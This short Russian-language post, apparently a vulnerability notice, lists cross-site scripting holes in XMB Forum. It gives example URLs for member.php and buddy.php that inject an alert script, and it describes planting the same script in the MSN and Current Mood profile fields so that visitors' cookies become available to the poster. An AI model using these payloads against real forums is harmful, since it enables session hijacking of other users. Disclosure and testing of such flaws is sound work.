Примеры уязвимостей в XMB Forum:

http://pathto/XMBforum/member.php? action=viewpro&member= admin<script>alert
(‘XSS’)</script>

и

http://pathto/XMBforum/buddy.php? action=<script>alert(‘XSS’) </script>&buddy=<
script>alert(‘XSS’)</script>

в вашем профайле: всего лишь заполним поля MSN и Current Mood следующим образом: 

<script>alert(‘XSS’) </script>

и когда другие пользователи будут созерцать ваш профайл, их куки будут доступны вам.



Оставить мнение